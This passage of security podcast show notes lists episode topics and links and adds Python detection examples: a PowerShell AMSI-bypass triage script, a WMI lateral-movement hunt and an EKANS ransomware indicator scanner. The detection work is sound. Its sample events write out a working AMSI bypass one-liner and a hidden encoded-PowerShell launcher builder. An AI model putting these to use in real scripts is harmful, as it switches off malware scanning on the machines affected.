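    """Build a powershell.exe command line carrying `script` as -EncodedCommand
    (PowerShell expects base64 of the UTF-16LE script). Used to construct samples."""
    b64 = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return "powershell.exe -NoP -W Hidden -enc " + b64


def decode_encoded_command(text):
    """Return the decoded script if `text` carries an -EncodedCommand payload,
    otherwise `text` unchanged (a 4104 ScriptBlockText is already plain)."""
    m = ENCODED_ARG.search(text)
    if not m:
        return text
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return text


def find_amsi_indicators(text):
    """Names of the AMSI indicators present in `text` (after decoding), in table order."""
    decoded = decode_encoded_command(text)
    return [name for name, pat in AMSI_INDICATORS.items() if pat.search(decoded)]


def triage(events):
    """Return [(RecordId, [indicator names])] for every event that matches."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 4104:            # script block logging
            text = ev.get("ScriptBlockText", "")
        elif ev.get("EventID") in (1, 4688):     # Sysmon / Security process creation
            text = ev.get("CommandLine", "")
        else:
            continue
        hits = find_amsi_indicators(text)
        if hits:
            alerts.append((ev["RecordId"], hits))
    return alerts


# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    {"RecordId": 101, "EventID": 4104,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"},
    {"RecordId": 102, "EventID": 4104,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"RecordId": 103, "EventID": 1,
     "CommandLine": encode_command("$t=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')")},
    {"RecordId": 104, "EventID": 1,
     "CommandLine": encode_command("Write-Output 'scheduled cleanup done'")},
]

if __name__ == "__main__":
    for record_id, hits in triage(SAMPLE_EVENTS):
        print(record_id, ", ".join(hits))
```

Literal matching is a first pass, not a complete answer: a script that assembles the type name at run time only exposes it when the assembled code is itself executed, and at that point script block logging records the inner block as its own 4104 event. That is the reason to keep 4104 logging on rather than relying on process command lines, which is why the decode step above exists only for the -EncodedCommand case.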
Dave’s new Esport initiative (opens in February): https://twitter.com/HackingDave/status/1220150360779710464
DERBYCON community updates
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 12, 2020
Nemesis: https://github.com/UnityTech/nemesis
Nemesis - an auditing tool to check against a set of benchmarks (CIS GCP only)
https://en.wikipedia.org/wiki/Center_for_Internet_Security
What does CIS do well?
What do the CIS benchmarks do poorly?
K8s workload identity - GKE specific
github.com/TaylorMutch
@mutchsecure
Amazon STS tokens
https://www.eventbrite.com/e/bsides-seattle-2020-tickets-86351434465
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Published on: March 4, 2020
Brakesec Podcast is now on Pandora! Find us here: https://pandora.app.link/p9AvwdTpT3
Book club
Book club is starting up again with Hands-On AWS Penetration Testing with Kali Linux by Gilbert and Caudill. You read and get together to discuss or demo every Monday. Get the book, start reading, and meet us for the kick-off on Monday the 24th at 10pm Eastern. The book club meets virtually on Zoom and organizes on Slack. Get invited like this.
Book: https://smile.amazon.com/Hands-Penetration-Testing-Kali-Linux/dp/1789136725
NolaCon Training:
https://nolacon.com/training/2020/security-detect-and-defense-ttx
Published on: February 26, 2020
Full notes and graphics are on www.brakeingsecurity.com
Episode 2020-006
Book club
Book club is starting up again with Hands-On AWS Penetration Testing with Kali Linux by Gilbert and Caudill. You read and get together to discuss or demo every Monday. Get the book, start reading, and meet us for the kick-off on Monday the 24th at 10pm Eastern. The book club meets virtually on Zoom and organizes on Slack. Get invited like this.
Book: https://smile.amazon.com/Hands-Penetration-Testing-Kali-Linux/dp/1789136725
NolaCon Training:
https://nolacon.com/training/2020/security-detect-and-defense-ttx
Roberto Rodriguez
Bio
@Cyb3rWard0g on Twitter
Threat Intel vs. Threat Hunting = what’s the difference?
What datasets are you using?
Did you start with any particular dataset, or created your own?
Technique development - what skills are needed?
C2 setup
Detection mechanisms
Honeypots
How can people get involved?
Blacksmith - creates a ‘Mordor’ environment and pushes scripts to set up honeypots/honeynets
https://Threathunterplaybook.com
https://github.com/hunters-forge/ThreatHunter-Playbook
https://www.exploit-db.com/exploits/47995 - Sudo buffer overflow
Mordor: The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption.
YAML Example: https://github.com/hunters-forge/ThreatHunter-Playbook/blob/master/playbooks/WIN-190810201010.yaml
Notebook Example:
Jupyter notebook - Definition: https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html
Lateral Movement - WMI - IMAGE Below
SIGMA?
Think of a notebook as a document that you can access via a web interface that allows you to save input (i.e. live code) and output (i.e. code execution results / evaluated code output) of interactive sessions, as well as important notes needed to explain the methodology and steps taken to perform specific tasks (i.e. data analysis).
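As an added example (not code from the Threat Hunter Playbook or the Mordor project), here is what one of these hunts looks like as plain Python over Mordor-style JSON lines rather than as notebook cells. It covers the WMI lateral movement case noted above (ATT&CK T1047): Sysmon process-creation events whose parent is WmiPrvSE.exe, joined on LogonId to a preceding network logon (Security 4624, logon type 3) on the same host, so that the finding carries the user and source address. The field names are assumed to follow Mordor's flattened Windows event JSON, and the sample records are constructed for the example.

```python
"""Hunt for process creation via remote WMI in Mordor-style JSON event data.

Added illustration for these show notes; not code from the Threat Hunter
Playbook or Mordor. Field names (Hostname, Channel, EventID, Image,
ParentImage, LogonId, TargetLogonId, ...) are assumed to follow Mordor's
flattened Windows event JSON; the records below are constructed.
"""
import json
from datetime import datetime, timedelta

SYSMON = "Microsoft-Windows-Sysmon/Operational"
# WmiPrvSE.exe hosts WMI providers; processes created through
# Win32_Process.Create (local or remote) appear as its children.
WMI_HOST_PROCESS = "\\wmiprvse.exe"


def load_events(jsonl_text):
    """Mordor ships one JSON object per line; skip blank lines."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def parse_ts(ts):
    """ISO-8601 UTC timestamp -> datetime, ignoring fractional seconds."""
    return datetime.strptime(ts.rstrip("Z").split(".")[0], "%Y-%m-%dT%H:%M:%S")


def network_logons(events):
    """Index Security 4624 network logons (LogonType 3) by (host, logon id)."""
    index = {}
    for ev in events:
        if ev.get("Channel") == "Security" and ev.get("EventID") == 4624 and ev.get("LogonType") == 3:
            index[(ev["Hostname"], ev["TargetLogonId"].lower())] = ev
    return index


def hunt_wmi_lateral_movement(events, window=timedelta(minutes=5)):
    """Sysmon EID 1 children of WmiPrvSE.exe, joined on LogonId to a network
    logon on the same host within `window` before the process start.
    Children with no such logon (local WMI use) are still returned with
    remote_logon=None so the analyst can triage them."""
    logons = network_logons(events)
    findings = []
    for ev in events:
        if ev.get("Channel") != SYSMON or ev.get("EventID") != 1:
            continue
        if not ev.get("ParentImage", "").lower().endswith(WMI_HOST_PROCESS):
            continue
        logon = logons.get((ev["Hostname"], ev.get("LogonId", "").lower()))
        remote = None
        if logon is not None:
            gap = parse_ts(ev["@timestamp"]) - parse_ts(logon["@timestamp"])
            if timedelta(0) <= gap <= window:
                remote = {"user": logon["TargetUserName"], "source_ip": logon["IpAddress"]}
        findings.append({
            "host": ev["Hostname"],
            "image": ev["Image"],
            "command_line": ev.get("CommandLine", ""),
            "remote_logon": remote,
        })
    return findings


# Constructed sample in the shape of a Mordor dataset (not real captured data).
SAMPLE_JSONL = r"""
{"@timestamp": "2020-02-19T10:00:00.000Z", "Hostname": "WS05.example.local", "Channel": "Security", "EventID": 4624, "LogonType": 3, "TargetLogonId": "0x3E7A1", "TargetUserName": "jdoe", "IpAddress": "172.18.39.5"}
{"@timestamp": "2020-02-19T10:00:03.000Z", "Hostname": "WS05.example.local", "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt", "LogonId": "0x3e7a1"}
{"@timestamp": "2020-02-19T10:01:00.000Z", "Hostname": "WS05.example.local", "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "LogonId": "0x3e7"}
{"@timestamp": "2020-02-19T10:02:00.000Z", "Hostname": "WS05.example.local", "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Program Files\\Monitoring\\agent.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "agent.exe --collect", "LogonId": "0x3e7"}
"""

if __name__ == "__main__":
    for finding in hunt_wmi_lateral_movement(load_events(SAMPLE_JSONL)):
        print(finding)
```

A child of WmiPrvSE.exe on its own is noisy (monitoring agents and management tooling use WMI locally all day), which is why the join to a network logon is what turns the event into a finding with a source address. In a notebook the same two steps would be two cells, with the JSON loaded into a dataframe first.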
Have a goal for expanding to other parts of ATT&CK?
Sub-techniques:
https://medium.com/mitre-attack/attack-sub-techniques-preview-b79ff0ba669a
Slack Channel:
https://launchpass.com/threathunting
Twitter;
https://twitter.com/mattifestation
https://twitter.com/Cyb3rPandaH
Published on: February 19, 2020
Brakeing Down Security Podcast on #Pandora-
https://www.pandora.com/podcast/brakeing-down-security-podcast/PC:27866
Published on: February 10, 2020
Marcus Carey https://twitter.com/marcusjcarey
Prolific Author, Defender, Enterprise Architect at ReliaQuest
https://www.darkreading.com/vulnerabilities---threats/reliaquest-acquires-threatcare/d/d-id/1335950
“GreyMatter integrates security data from security incident and event manager (SIEM), endpoint detection and response (EDR), firewalls, threat intelligence feeds, and other security tools, and includes analysis functions and automation. Threatcare's technology — which will become a new feature on the platform — simulates how a specific threat or attack could target an organization's network in order to determine whether its security tools and settings are or are not actually working to thwart the threats.”
Security model - everyone’s is different
How do you work with your threat model?
A proper threat model
Attack Simulation -
How is this different from doing a typical Incident Response tabletop? Threat modeling systems?
How is this different than a pentest?
Is this automated red teaming? How effective can automated testing be?
Is this like some kind of constant scanning system?
How does this work with threat intel feeds?
Can it simulate ransomware, or any attacks?
Hedgehog principles
A lot of things crappily, and nothing good
Mr. Boettcher: “Why suck at everything…”
Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
ATT&CK Matrix - https://attack.mitre.org/matrices/enterprise/
Tribe of Hackers
https://smile.amazon.com/Tribe-Hackers-Cybersecurity-Advice-World/dp/1793464189 - Red Book
The Tribe of Hackers team is back with a new guide packed with insights from dozens of the world’s leading Red Team security specialists. With their deep knowledge of system vulnerabilities and innovative solutions for correcting security flaws, Red Team hackers are in high demand. Tribe of Hackers Red Team: Tribal Knowledge from the Best in Offensive Cybersecurity takes the valuable lessons and popular interview format from the original Tribe of Hackers and dives deeper into the world of Red Team security with expert perspectives on issues like penetration testing and ethical hacking. This unique guide includes inspiring interviews from influential security specialists, including David Kennedy, Rob Fuller, Jayson E. Street, and Georgia Weidman, who share their real-world learnings on everything from Red Team tools and tactics to careers and communication, presentation strategies, legal concerns, and more.
https://smile.amazon.com/Tribe-Hackers-Cybersecurity-Advice-World/dp/1119643376 - Yellow Book
Tribe of Hackers: Cybersecurity Advice from the Best Hackers in the World is your guide to joining the ranks of hundreds of thousands of cybersecurity professionals around the world. Whether you’re just joining the industry, climbing the corporate ladder, or considering consulting, Tribe of Hackers offers the practical know-how, industry perspectives, and technical insight you need to succeed in the rapidly growing information security market. This unique guide includes inspiring interviews from 70 security experts, including Lesley Carhart, Ming Chow, Bruce Potter, Robert M. Lee, and Jayson E. Street.
https://smile.amazon.com/Tribe-Hackers-Security-Leaders-Cybersecurity/dp/1119643775 - Green Book
(Next out!)
Information security is becoming more important and more valuable all the time. Security breaches can be costly, even shutting businesses and governments down, so security leadership is a high-stakes game. Leading teams of hackers is not always easy, but the future of your organization may depend on it. In this book, the world’s top security experts answer the questions that Chief Information Security Officers and other security leaders are asking, including:
https://smile.amazon.com/Tribe-Hackers-Blue-Team-Cybersecurity/dp/1119643414 - Blue Book
(OUT SOON!)
Tribe of Hackers Blue Team goes beyond the bestselling, original Tribe of Hackers book and delves into detail on defensive and preventative techniques. Learn how to grapple with the issues that hands-on security experts and security managers are sure to build into their blue team exercises.
Published on: February 5, 2020
SSH 2FA gist https://gist.github.com/lizthegrey/9c21673f33186a9cc775464afbdce820
Honeycomb.io for digging into access logs & retracing what pentesters do.
Published on: January 30, 2020
Ms. Berlin's appearance on #misec podcast - https://www.youtube.com/watch?v=Cj2IF0zn_BE with @kentgruber and @quantissIA
Blog post:
https://www.honeycomb.io/blog/incident-report-running-dry-on-memory-without-noticing/
What is Honeycomb.io?
From the site:
“Honeycomb is a tool for introspecting and interrogating your production systems. We can gather data from any source—from your clients (mobile, IoT, browsers), vendored software, or your own code. Single-node debugging tools miss crucial details in a world where infrastructure is dynamic and ephemeral. Honeycomb is a new type of tool, designed and evolved to meet the real needs of platforms, microservices, serverless apps, and complex systems.”
What are SLOs and how do you establish them? Are they anything like SLA (Service level agreements)?
Can you give us an idea of timeline? Length of time from issue to IR to resolution?
Are the dashboards mentioned in the blog post your operations dashboard?
[nope! hashtag no-dashboards]
Leading and lagging indicators (IT and infosec call them detection and mitigation indicators)
https://kpilibrary.com/topics/lagging-and-leading-indicators
How important is telemetry (or meta-telemetry, since it’s telemetry on telemetry, if I’m reading it right --brbr) in making sure you can understand issues?
Do you have levels of escalation? How do you define those?
When you declared an emergency, how did brainstorming help with addressing the issues? Does that help your org see the way to a proper fix?
Did you follow any specific methodology? Did you have a war room or web conference?
Communications:
https://twitter.com/lizthegrey/status/1192036833812717568
Can being over transparent be detrimental?
Communication methods in an IR:
Slack
Phone Tree
Ticket system
Emails
What does escalation look like for Ms. Berlin? Mr. Boettcher? (stories or examples?)
Confirmation bias (or “it’s never in our house”) fallacy
“I’ve seen and been a part of that, very prevalent in IT” --brbr
Especially when the bias is based on previous outages/issues
From the blog: “We quickly found ourselves locked in a state of confirmation bias…”
Root Cause Analysis:
Once you diagnosed the issue, how quickly was a fix pushed out?
What kind of documentation or monitoring was generated/added to ensure this won’t happen again?
Published on: January 23, 2020
Educause conference: https://events.educause.edu/security-professionals-conference/2020/hotel-and-travel
Amanda’s Training that everyone should come to!!! https://nolacon.com/training/2020/security-detect-and-defense-ttx
Follow twitter.com/infosecroleplay
Discussion:
What happened over the holidays? What did you get for christmas?
PMP test is scheduled for 10 March
Proposal: Anonymous Hacker segment
Similar to “The Stig” on Top Gear. If you would like to come on and discuss any topic you would like. You’ll have anonymity, we won’t share your contact info
Full article: https://securityaffairs.co/wordpress/96295/malware/joker-malware-actiity.html
Excerpt:
Google revealed it successfully removed more than 1,700 apps from the Play Store over the past three years that had been infected with the Joker malware.
Google provided technical details of its activity against the Joker malware (aka Bread) operation during the last few years.
The Joker malware is malicious code camouflaged as a system app that allows attackers to perform a broad range of malicious operations, including disabling the Google Play Protect service, installing malicious apps, generating fake reviews, and showing ads.
The spyware is able to steal SMS messages, contact lists and device information, and to sign victims up for premium service subscriptions.
In October, Google removed 24 apps from Google Play because they were infected with Joker malware; the 24 malicious apps had a total of 472,000 installs.
“Over the past couple of weeks, we have been observing a new Trojan on GooglePlay. So far, we have detected it in 24 apps with over 472,000+ installs in total.”
“…apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user’s carrier,” reads the post published by Google.
The newer versions of the Joker malware were involved in toll fraud that consist of tricking victims into subscribing to or purchasing various types of content via their mobile phone bill.
WAP billing: https://en.wikipedia.org/wiki/WAP_billing
Example: Pokémon Go allows in-app purchases.
Full Article: https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/
Excerpt:
On Friday, January 10, 2020, our honeypots detected opportunistic mass scanning activity originating from a host in Germany targeting Citrix Application Delivery Controller (ADC) and Citrix Gateway (also known as NetScaler Gateway) servers vulnerable to CVE-2019-19781. This critical vulnerability allows unauthenticated remote attackers to execute commands on the targeted server after chaining an arbitrary file read/write (directory traversal) flaw.
4,576 unique autonomous systems (network providers) were found to have vulnerable Citrix endpoints on their network. We’ve discovered this vulnerability currently affects:
This critical vulnerability is easy for attackers to exploit using publicly available proof-of-concept code. Various methods demonstrating how to exploit CVE-2019-19781 have been posted on GitHub by Project Zero India and TrustedSec. A forensic guide is available detailing how to check Citrix servers for evidence of a compromise.
Further exploitation of this vulnerability could be used to spread ransomware (similar to CVE-2019-11510) and cryptocurrency mining malware on sensitive networks. If multiple servers are compromised by the same threat actor, they could be weaponized for coordinated malicious activity such as DDoS attacks.
Full Article: https://www.ehackingnews.com/2020/01/snake-ransomware-targets-entire.html
Excerpt:
The new Snake Ransomware family sets out to target organizations’ corporate networks in their entirety. It is written in Golang and contains a significant level of obfuscation; the observations and disclosure of the attacks were made by a group of security specialists from the MalwareHunterTeam.
The Ransomware upon successful infection subsequently erases the machine's Shadow Volume Copies before ending different processes related to SCADA frameworks, network management solutions, virtual machines, and various other tools.
After that, it continues to encrypt the machine's files while skirting significant Windows folders and system files. As a feature of this procedure, it affixes "EKANS" as a file marker alongside a five-character string to the file extension of each file it encrypts. The threat wraps up its encryption routine by dropping a ransom note entitled "Fix-Your-Files.txt" in the C:\Users\Public\Desktop folder, which instructs victims to contact "[email protected]" so as to purchase a decryption tool.
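As an added example (not code from the article or from the podcast), a read-only triage scanner for the two indicators the excerpt names: it walks a directory tree, flags files whose trailing bytes are the “EKANS” marker, and reports any Fix-Your-Files.txt ransom note it finds. That the marker sits at the very end of an encrypted file, that the five random characters are appended after the original extension, and the sample tree it builds are all assumptions made for the demonstration.

```python
"""Triage scanner for the Snake/EKANS indicators described in the excerpt.

Added example, not the article's or the podcast's code. Assumptions:
  * the "EKANS" file marker is the last five bytes of an encrypted file;
  * the five-character string is appended after the original extension,
    e.g. report.docx -> report.docxAbCdE;
  * the sample tree built by build_sample_tree() is constructed here.
The scanner only reads; it never modifies or deletes anything.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field
from typing import List, Optional

RANSOM_NOTE = "Fix-Your-Files.txt"          # name quoted in the excerpt
MARKER = b"EKANS"                            # file marker quoted in the excerpt
EXPECTED_NOTE_DIR = os.path.join("Users", "Public", "Desktop")  # drop location

# Heuristic only: "<name>.<2-5 char ext><exactly 5 extra chars>".
# Ambiguous by nature, so it is reported as a weak signal, not as proof.
_RENAMED = re.compile(r"^(.*\.[A-Za-z0-9]{2,5})([A-Za-z0-9]{5})$")


@dataclass
class ScanResult:
    marked_files: List[str] = field(default_factory=list)   # trailing EKANS marker
    ransom_notes: List[str] = field(default_factory=list)   # Fix-Your-Files.txt
    renamed_only: List[str] = field(default_factory=list)   # name pattern, no marker


def has_ekans_marker(path: str) -> bool:
    """True if the file ends with the EKANS marker (assumed placement)."""
    try:
        size = os.path.getsize(path)
        if size < len(MARKER):
            return False
        with open(path, "rb") as fh:
            fh.seek(size - len(MARKER))
            return fh.read(len(MARKER)) == MARKER
    except OSError:
        return False


def looks_renamed(name: str) -> Optional[str]:
    """Guess the original file name if the name fits the 5-char suffix pattern."""
    match = _RENAMED.match(name)
    return match.group(1) if match else None


def scan_tree(root: str) -> ScanResult:
    """Walk root read-only and collect the three indicator classes."""
    result = ScanResult()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == RANSOM_NOTE:
                result.ransom_notes.append(path)
            elif has_ekans_marker(path):
                result.marked_files.append(path)
            elif looks_renamed(name):
                result.renamed_only.append(path)
    return result


def build_sample_tree() -> str:
    """Constructed sample: a clean file, a marked file, a look-alike, a note."""
    root = tempfile.mkdtemp(prefix="ekans-demo-")
    with open(os.path.join(root, "clean.txt"), "wb") as fh:
        fh.write(b"quarterly numbers\n")
    with open(os.path.join(root, "report.docxAbCdE"), "wb") as fh:
        fh.write(os.urandom(64) + MARKER)          # marker appended, as assumed
    with open(os.path.join(root, "notes.txtQwErT"), "wb") as fh:
        fh.write(b"odd name but no marker\n")      # name pattern only
    note_dir = os.path.join(root, EXPECTED_NOTE_DIR)
    os.makedirs(note_dir)
    with open(os.path.join(note_dir, RANSOM_NOTE), "w", encoding="utf-8") as fh:
        fh.write("constructed placeholder note\n")
    return root


if __name__ == "__main__":
    found = scan_tree(build_sample_tree())
    print("marked:", [os.path.basename(p) for p in found.marked_files])
    print("notes:", [os.path.basename(p) for p in found.ransom_notes])
    print("name-only:", [os.path.basename(p) for p in found.renamed_only])
```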
Published on: January 13, 2020
Are things better than 10 years ago? 5 years ago?
If there was one thing to change things for the better, what would that be?
Did naming vulns make things better?
Which industries are doing a good job of securing themselves? Finance?
What do you wish had never happened (security/compliance-wise)?
Ransomware infections with no bounties
Still have people believing “Nessus” is a pentest
https://www.retailitinsights.com/eventscalendar/eventdetail/1c77d5c6-8625-4f2b-bb98-89cca6590c49
https://www.apics.org/credentials-education/events
PREDICTIONS!!!
Bryan: The rise of the vetting programs (Companies will want to vet content creators in their eco-systems)
Cybuck: An uptick in surveillance tech; both disguised as cool home smart gadgets and straight up public safety. Triggering a US GDPR type response.
Injection remains as the undisputed heavyweight champion of app sec vulnerability (OWASP top 10). And wishful thinking...broken authentication moves lower, denial of service goes down. https://twitter.com/WeldPond/status/1207383327491137536/photo/1
JB: a major change in social media / a generational shift in how we use it, legally or with a focus on new types of mobile tech, for example. Human networking in real life in the age of ‘social’. “When you hire someone… you also hire their rolodex”: what do you think about this statement, and its role in InfoSec? Talent?
JB- shouted out https://github.com/redcanaryco/atomic-red-team (Invoke-Atomic framework with powershell now on Linux, OSX, and Windows)
JB - Link to the hunting/stopping-human-trafficking org I mentioned:
Shoutout
Sherrie Caltagirone, Executive Director, Global Emancipation Network @GblEmancipation
https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1569941622.pdf
Mentioned https://monitorama.com/ and https://github.com/viq/air-monitoring-scripts (viq from Brakesec)
Talk about where you were 10 years ago, and what you did to get where you are?
Best Hacking tool?
Best Enterprise Tool?
https://www.phoronix.com/scan.php?page=news_item&px=CERN-MALT-Microsoft-Alternative
https://www.iotworldtoday.com/2019/12/21/2020-predictions-apis-become-a-focus-of-iot-security/
https://www.jonesday.com/en/insights/2018/10/california-to-regulate-security-of-iot-devices
https://www.infosecurity-magazine.com/magazine-features/what-makes-a-ciso-employable/
https://www.owasp.org/index.php/OWASPTop10-2010-PressRelease
Published on: December 23, 2019
The day after part 1
Keybase halted the spacedrop the day after the first podcast is complete...
Security failures in implementation
“We need to push this to market, we’ll patch it later!”
Risk management discussion for project managers (PMP)
CIA Triad… where does ‘business goals’ fit? Security is at odds with the bottom line
**Reference Noid’s Bsides Seattle talk and podcast earlier this year.**
Other companies that have made security mistakes in the name of business
Practical Pentest Labs storing passwords in the clear
https://twitter.com/mortalhys/status/1202867037120475136
https://web.archive.org/web/20191207132548/https://twitter.com/mortalhys/status/1202867037120475136
https://twitter.com/piaviation/status/1202994484172218368
T-Mobile Austria partial password issues:
https://www.pcmag.com/news/360301/t-mobile-austria-admits-to-storing-passwords-partly-in-clear
No one was championing security, because no one considered the problems with partial disclosure of the passphrase in an account.
Marketing people running your social media accounts do NOT help allay security issues (because they didn’t have escalation procedures for vulnerability disclosure)
Insider threats could take over accounts
Follow-up from last week’s show with Bea Hughes:
I liked the interesting discussion about security and DevOps teams with Bea Hughes in your recent podcast. When you mentioned you are taking your PMP for agile, I'm surprised you did not mention the term "product owner". You were asking who cares about security that you, as a security guy, can talk to. Bea mentioned that it was the "stakeholders", but in the agile process the "product owner" is the team's advocate for the "stakeholders".
And you also mentioned "PM", as in project manager. In an agile world, the typical PM role is minimized. Actually, ideally the PM is removed entirely in favor of empowered teams. Empowered teams understand that good products are reliable and secure. (Secure because the security CIA includes "availability" and "integrity", aka reliability.)
As Director of DevOps for my 4,000-person-strong consulting company, I'm working with our security team to push responsibility for security to our development teams. Empowering them to take the time and bear the costs of using security tools prior to release and during system operation is what we are working on now, as we roll into 2020.
**If the ‘product owner’ or ‘empowered team’ does not consider security a priority/requirement, then who champions security? It only becomes a priority when something bad happens, like a breach.**
“Empowered teams”
Some people aren’t fans: https://hackernoon.com/the-surprising-misery-of-empowered-teams-35c3679cf11e
Published on: December 18, 2019
Patreon donor goodness: Scott S. and Ion S.
@_noid_ @davedittrich
Their response:
“it’s not a bug, it’s a feature”
“Don’t write a blog post that will point out the issue”
“You pointing out our issues makes things more difficult for us”
“It’s a free service, why are you hurting us?”
https://keybase.io/docs/bug_reporting
Nov 22nd
Noid (@_noid_) Keybase discussion blog post
https://www.whiskey-tango.org/2019/11/keybase-weve-got-privacy-problem.html
Reddit post showing potential SE attacks occurring: https://www.reddit.com/r/Keybase/comments/e6uou3/hi_guys_i_received_a_message_today_that_is/
Keybase’s decision to fix it came out after The Register asked them about the issue…
Dec 4th
https://keybase.io/blog/dealing-with-spam
Dec 5th
https://www.theregister.co.uk/2019/12/05/keybase_struggles_with_harassment/
Problems with the implementation:
Requiring admins for Keybase to decide what’s wrong or if they need to be deleted
Additional dummy accounts being created on other sites (keybase, twitter, git, reddit, etc), generating problems for those services (as if Twitter doesn’t have enough issues with bots/shitty people)
Cryptocurrency = trolls/phishing/SE attempts to get folks to hand over their lumens (what’s the motivation of creating the coin?)
They’ve already opened the spam door, and they’ll not be able to shut it.
Once they took the VC and aligned themselves with Stellar, the attack surface changes
From Account takeover (integrity attacks) to deception (social engineering)
What is keybase?
Social network?
E2E chat
Encrypted file share/storage?
CryptoCurrency Company?
Secure git repo protector?
Which ones do they do well?
How could they have solved the spam issue?
Made the cryptocoin a separate application?
Even their /r/keybase is filling up with spammers asking about their Lumens
How could they fix it?
You can’t contact someone unless that person allows you to.
Allow someone to contact you, but do not allow adding to teams without permission
https://news.ycombinator.com/item?id=21719702 (ongoing HN thread)
Noid isn’t the only person with issues in Keybase: https://vicki.substack.com/p/keybase-and-the-chaos-of-crypto
https://keybase.io/docs-assets/blog/NCC_Group_Keybase_KB2018_Public_Report_2019-02-27_v1.3.pdf
Stephen Carter's definition of “integrity.”
Integrity, as I will use the term, requires three steps: (1) discerning what is right and what is wrong, (2) acting on what you have discerned, even at personal cost; and (3) saying openly that you are acting on your understanding of right from wrong.
— Stephen Carter, “Integrity.” Harper-Collins. https://www.harpercollins.com/9780060928070/integrity/
Can the person [who took the controversial act] explain their reasoning, based on principles they can articulate and would follow even if it meant they paid a price? Or do they selectively choose principles in arbitrary ways so as to fit the current circumstances in order to guarantee they get an outcome that benefits them?
noid’s blog post clearly documents the timeline of interactions with Keybase, including: (1) providing detailed steps to reproduce; (2) suggesting mitigations that could be implemented in the architecture; (3) providing guidance to users to protect themselves when the vulnerability disclosure was made public; and (4) justifying his decision to go public by citing and following a vulnerability disclosure policy of a major industry leader in this area, Google:
The right to privacy of your information, as well as the right to choose with whom you associate and communicate, are both arguably duties based on the concept of autonomy (i.e., your right to choose).
In biomedical and behavioral research, the principle involved here is known as Respect for Persons and is best recognized as the idea of informed consent. Giving users autonomy in making their data public, but not giving them autonomy in who they allow to communicate with them and add them to “teams,” could be viewed as conflicting as regards this principle.
This is in fact precisely what noid brought up in his initial communication with Keybase:
I had a random guy I don’t follow add me to a team and start messaging me about cryptocurrency stuff. This really shouldn’t be default behavior. This can result in a spam or harassment vector (hence why I’m reluctant to post it on the open forum). Ideally the default behavior should be that no one can add you to a team without your consent. Then maybe have an option of allowing those you follow to be able to do so, and as a final option let anyone add you to a team (but make sure folks know this isn’t recommended).
Published on: December 10, 2019
Realistic Threats
Nation states aren’t after you
https://twitter.com/beajammingh/status/1191884466752385025
https://twitter.com/beajammingh/status/1198671660150226946
https://twitter.com/beajammingh/status/1198671952824565762
https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
What are credible threats?
Malicious insiders -
Non-malicious insiders - https://www.scmagazine.com/home/security-news/not-every-insider-threat-is-malicious-but-all-are-dangerous/
Education issue?
Is there such a thing as ‘non-malicious’ or is this just bunk?
Real threats
https://resources.infosecinstitute.com/5-new-threats-every-organization-prepared-2018/
CIO magazine threats -- buzzword threats (we should totally containerize all the things)
Vulns that have names (blue team is stuck dealing with ‘theoretical’ issues e.g. SPECTRE/MELTDOWN)
Lack of well-priced training?
Dev Training?
Security Training?
Better management communication will reduce threats
Building trust so they don’t freak when ‘$insert_named_vuln’ shows up
Gotta frame it to business needs
“Everyone is vulnerable” - keep FUD to a minimum, don’t exaggerate.
Know your industry’s threats (phishing, money transfer fraud, malware)
Patreon donor: Michael K. $10 patron!
Layer8conf - https://www.workshopcon.com/events
https://layer8conference.com/
